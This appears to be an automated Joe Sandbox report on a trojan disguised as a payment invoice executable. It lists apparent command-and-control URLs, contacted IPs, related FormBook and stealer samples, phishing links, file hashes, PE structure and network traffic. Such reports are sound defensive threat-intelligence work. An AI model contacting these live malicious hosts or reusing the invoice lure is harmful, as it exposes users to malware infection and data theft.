                                                                                  https://duckduckgo.com/ac/?q=xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://tempuri.org/DataSet1.xsdDue Payment Invoice PISS2024993.exefalse
                                                                                    unknown
                                                                                    https://www.shintow.net/ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/ZecJjnESPXORw.exe, 00000005.00000002.3914135541.00000000043A6000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.0000000003B66000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://meanttobebroken.org/zdt7/?pZxtux=OdyTsfpKOpcJjnESPXORw.exe, 00000005.00000002.3914135541.00000000049EE000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.00000000041AE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.ecosia.org/newtab/xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeEcJjnESPXORw.exe, 00000005.00000002.3914135541.000000000485C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.000000000401C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://ac.ecosia.org/autocomplete?q=xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.ak711ka10.latcJjnESPXORw.exe, 00000005.00000002.3915813020.00000000062CE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            154.23.181.7
                                                                                            www.ak711ka10.latUnited States
                                                                                            174COGENT-174USfalse
                                                                                            141.193.213.11
                                                                                            www.meanttobebroken.orgUnited States
                                                                                            396845DV-PRIMARY-ASN1USfalse
                                                                                            13.248.169.48
                                                                                            www.ila.beautyUnited States
                                                                                            16509AMAZON-02USfalse
                                                                                            69.57.163.227
                                                                                            www.mireela.proUnited States
                                                                                            25653FORTRESSITXUSfalse
                                                                                            76.223.67.189
                                                                                            mjmegartravel.onlineUnited States
                                                                                            16509AMAZON-02USfalse
                                                                                            162.241.63.77
                                                                                            estrela-b.onlineUnited States
                                                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                                                            172.67.177.220
                                                                                            www.theawareness.shopUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            3.33.130.190
                                                                                            micrhyms.infoUnited States
                                                                                            8987AMAZONEXPANSIONGBfalse
                                                                                            142.250.185.115
                                                                                            ghs.googlehosted.comUnited States
                                                                                            15169GOOGLEUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1541207
                                                                                            Start date and time:2024-10-24 15:28:00 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 9m 33s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Run name:Run with higher sleep bypass
                                                                                            Number of analysed new started processes analysed:8
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:1
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:Due Payment Invoice PISS2024993.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@10/9
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 94%
                                                                                            • Number of executed functions: 191
                                                                                            • Number of non-executed functions: 243
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • VT rate limit hit for: Due Payment Invoice PISS2024993.exe
                                                                                            TimeTypeDescription
                                                                                            09:30:04API Interceptor5611021x Sleep call for process: xcopy.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            154.23.181.7bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.ak711ka10.lat/o5z9/
                                                                                            141.193.213.11http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/Get hashmaliciousUnknownBrowse
                                                                                            • hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/favicon.ico
                                                                                            http://www.aggielandhotel.comGet hashmaliciousUnknownBrowse
                                                                                            • www.aggielandhotel.com/
                                                                                            http://www.trayak.comGet hashmaliciousUnknownBrowse
                                                                                            • www.trayak.com/
                                                                                            http://tacinc.orgGet hashmaliciousUnknownBrowse
                                                                                            • tacinc.org/
                                                                                            http://howardstallings.comGet hashmaliciousUnknownBrowse
                                                                                            • www.howardstallings.com/
                                                                                            http://solistone.comGet hashmaliciousUnknownBrowse
                                                                                            • solistone.com/
                                                                                            http://venteon.comGet hashmaliciousUnknownBrowse
                                                                                            • www.venteon.com/
                                                                                            http://varsity.comGet hashmaliciousUnknownBrowse
                                                                                            • varsity.com/
                                                                                            http://varsity.comGet hashmaliciousUnknownBrowse
                                                                                            • varsity.com/
                                                                                            http://varsity.comGet hashmaliciousUnknownBrowse
                                                                                            • varsity.com/
                                                                                            13.248.169.48Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.lunch.delivery/qwed/
                                                                                            FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • www.how2.guru/7eim/
                                                                                            General terms and conditions of sale - Valid from 10202024 to 12312024.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.sleepstudy.clinic/qb3j/?ldz=rxiD0VSh&jB=cFuFzZ3YvTtiHrP9YgB50pNFy1R7naj/7FPBP4W+y4TnGL17Vly9WSpF5ldignjoFUjCQ6N7kk5Em/mIXQaOgZKVJHh7DFNdo3QSNa+0F8GHeDzAsg==
                                                                                            zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • www.3808.app/t4fd/
                                                                                            PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • www.ila.beauty/izfe/
                                                                                            Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.discountprice.shop/dmec/
                                                                                            request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • www.3808.app/4do9/
                                                                                            NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.3808.app/4do9/
                                                                                            PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.moneta.life/qzre/
                                                                                            lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.comedy.finance/mwd0/
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.meanttobebroken.orgbin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 141.193.213.10
                                                                                            PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • 141.193.213.10
                                                                                            www.theawareness.shopmm.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.177.220
                                                                                            FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 172.67.177.220
                                                                                            bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.177.220
                                                                                            www.mireela.probin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 69.57.163.227
                                                                                            www.ila.beautybin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 13.248.169.48
                                                                                            PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • 13.248.169.48
                                                                                            www.ak711ka10.latbin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 154.23.181.7
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            DV-PRIMARY-ASN1USbin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 141.193.213.10
                                                                                            PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • 141.193.213.10
                                                                                            https://click.pstmrk.it/3s/tldr.tech%2Fconfirmed%3Femail%3Djames.ward%2540gerflor.com%26newsletter%3Dinfosec/pEGE/grO4AQ/AQ/de2d9b1d-a87c-40b3-97e7-314a53573877/2/GfrX-GFLqnGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 141.193.213.20
                                                                                            https://stacksports.captainu.comGet hashmaliciousUnknownBrowse
                                                                                            • 141.193.213.20
                                                                                            https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                                                                            • 141.193.213.11
                                                                                            http://www.gofreight.com/Get hashmaliciousUnknownBrowse
                                                                                            • 141.193.213.10
                                                                                            http://pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 141.193.213.20
                                                                                            http://pub-682ad3b65d944376b919745aae3c56d4.r2.dev/document14.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 141.193.213.21
                                                                                            http://pub-ce2d0679453d4fa48743eacb8ce0cf4e.r2.dev/log.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 141.193.213.21
                                                                                            http://pub-945293ef7a9047adb26d2ddd47a2d837.r2.dev/cpanel.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 141.193.213.20
                                                                                            FORTRESSITXUSP1 BOL.exeGet hashmaliciousUnknownBrowse
                                                                                            • 69.57.163.227
                                                                                            bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 69.57.163.227
                                                                                            request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • 69.57.163.227
                                                                                            NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                            • 69.57.163.227
                                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                                            • 208.116.54.234
                                                                                            origin.bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 65.181.111.142
                                                                                            origin.bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 65.181.111.142
                                                                                            Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                            • 65.181.111.180
                                                                                            https://centuriontm.bizarreonly.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                            • 69.57.163.207
                                                                                            http://hitbrosent.com/new/review/Dkx4NItiuK6qQVIcsb7yvXvQ/ZGhpbG1lckByb3dtYXJrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 69.57.161.242
                                                                                            AMAZON-02USATT25322.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 54.216.81.134
                                                                                            https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousUnknownBrowse
                                                                                            • 143.204.215.107
                                                                                            https://app.pandadoc.com/document/v2?token=69b8ae0059c2551a9a27ed1b65653c1a0b5ee1ffGet hashmaliciousUnknownBrowse
                                                                                            • 44.236.119.144
                                                                                            https://app.writesonic.com/share/writing-assistant/d140c48b-3642-43bf-a085-e258c1fb4f03Get hashmaliciousUnknownBrowse
                                                                                            • 3.161.75.15
                                                                                            https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousUnknownBrowse
                                                                                            • 143.204.215.66
                                                                                            Meridian Group Inc - Contact Submission (70.2 KB)Get hashmaliciousUnknownBrowse
                                                                                            • 3.141.169.43
                                                                                            ppc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 54.171.230.55
                                                                                            attachment(1).emlGet hashmaliciousUnknownBrowse
                                                                                            • 54.200.229.67
                                                                                            https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                                                                                            • 44.236.119.144
                                                                                            PO 635614 635613_CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 13.33.187.120
                                                                                            COGENT-174USkeldRUiaay.elfGet hashmaliciousMiraiBrowse
                                                                                            • 38.13.111.117
                                                                                            QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                            • 154.7.176.67
                                                                                            https://2007.filemail.com/api/file/get?filekey=58mKUrTMdlmzqkRvo0UdVa2TMjJTCQiSNv5rUBtsDQTNU0dM4JzppUJaOrP_mWxCym0k9l5xEDeaXunPsHq6frY8XZH_gnclw86MefA3bpAlGuDkr77-xSqrMOQIlMdW5cRjwoOSCWIlTwpC48cNKMMHhMKp&track=P8fpm4ry&pk_vid=8a8b18f03738ae4f17297703684d559dGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 50.7.84.74
                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                            • 154.26.106.167
                                                                                            mm.exeGet hashmaliciousUnknownBrowse
                                                                                            • 38.47.207.164
                                                                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 66.28.161.34
                                                                                            botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 38.195.11.68
                                                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 154.42.69.224
                                                                                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                            • 206.4.248.210
                                                                                            Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 206.119.82.134
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):1.121297215059106
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.940725986819091
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:Due Payment Invoice PISS2024993.exe
                                                                                            File size:764'928 bytes
                                                                                            MD5:e36a9532eb81c28dd0ed418c61774138
                                                                                            SHA1:63842c24e62c29a7695134da51e6cfa7654ce2d4
                                                                                            SHA256:5bf41f92b016c6c045f3b10573788b4c7cc6b11e20b2a57ae5d4943c1b160da4
                                                                                            SHA512:32c38352431c3a292f44f7342e13b4788f1e5c5f9e3ad0de30661518a2f224c1b593ce34998b17d150b3923fb02afe0c84cd653c54e5b8d53cc7382d541534db
                                                                                            SSDEEP:12288:QCfia3VrRRDPntqbMFrP62V1dHGwk2GvZBSBjUI5v/wxDPVvs:QYiG7DPniMV6+j02GvXmjULxjVv
                                                                                            TLSH:9BF412546BD48722C17E7BF909B650B123F2B5AB2837E35C8DC608EE1E77B004A9571B
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T................0.................. ........@.. ....................................@................................
                                                                                            Icon Hash:00928e8e8686b000
                                                                                            Entrypoint:0x4bbff2
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0xC0E554B8 [Wed Jul 20 15:41:44 2072 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add al, byte ptr [eax]
                                                                                            adc byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            and byte ptr [eax], al
                                                                                            add byte ptr [eax+00000018h], al
                                                                                            push eax
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], 00000000h
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add dword ptr [eax], eax
                                                                                            add dword ptr [eax], eax
                                                                                            add byte ptr [eax], al
                                                                                            cmp byte ptr [eax], al
                                                                                            add byte ptr [eax+00000000h], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add dword ptr [eax], eax
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], 00000000h
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [ecx], al
                                                                                            add byte ptr [ecx], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax+00h], ch
                                                                                            add byte ptr [eax+00000000h], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add dword ptr [eax], eax
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            xor byte ptr [eax+eax], al
                                                                                            add byte ptr [eax-5FFFF440h], dl
                                                                                            add eax, dword ptr [eax]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax+00003403h], ah
                                                                                            add byte ptr [esi+00h], dl
                                                                                            push ebx
                                                                                            add byte ptr [edi+00h], bl
                                                                                            push esi
                                                                                            add byte ptr [ebp+00h], al
                                                                                            push edx
                                                                                            add byte ptr [ebx+00h], dl
                                                                                            dec ecx
                                                                                            add byte ptr [edi+00h], cl
                                                                                            dec esi
                                                                                            add byte ptr [edi+00h], bl
                                                                                            dec ecx
                                                                                            add byte ptr [esi+00h], cl
                                                                                            inc esi
                                                                                            add byte ptr [edi+00h], cl
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            mov ebp, 00000004h
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbbf9d0x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x630.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb9e800x70.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000xb9ff80xba0001a9f715b34c7cc3449be736356de55cbFalse0.9548208585349462data7.948212011277769IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xbc0000x6300x80083e6aca2e6b5420b03b362849b0c1bdaFalse0.34033203125data3.481877415160437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xbe0000xc0x200bc9dccfa8ef4c61ad1a444c44730566eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0xbc0900x3a0data0.4224137931034483
                                                                                            RT_MANIFEST0xbc4400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 24, 2024 15:29:41.498536110 CEST4986680192.168.2.513.248.169.48
                                                                                            Oct 24, 2024 15:29:41.504606009 CEST804986613.248.169.48192.168.2.5
                                                                                            Oct 24, 2024 15:29:41.504724979 CEST4986680192.168.2.513.248.169.48
                                                                                            Oct 24, 2024 15:29:41.512497902 CEST4986680192.168.2.513.248.169.48
                                                                                            Oct 24, 2024 15:29:41.517895937 CEST804986613.248.169.48192.168.2.5
                                                                                            Oct 24, 2024 15:29:42.174063921 CEST804986613.248.169.48192.168.2.5
                                                                                            Oct 24, 2024 15:29:42.204410076 CEST804986613.248.169.48192.168.2.5
                                                                                            Oct 24, 2024 15:29:42.204622030 CEST4986680192.168.2.513.248.169.48
                                                                                            Oct 24, 2024 15:29:42.205985069 CEST4986680192.168.2.513.248.169.48
                                                                                            Oct 24, 2024 15:29:42.213717937 CEST804986613.248.169.48192.168.2.5
                                                                                            Oct 24, 2024 15:29:57.265531063 CEST4994980192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:57.271713972 CEST8049949142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:29:57.271800995 CEST4994980192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:57.283437014 CEST4994980192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:57.290237904 CEST8049949142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:29:58.218060017 CEST8049949142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:29:58.272653103 CEST4994980192.168.2.5142.250.185.115
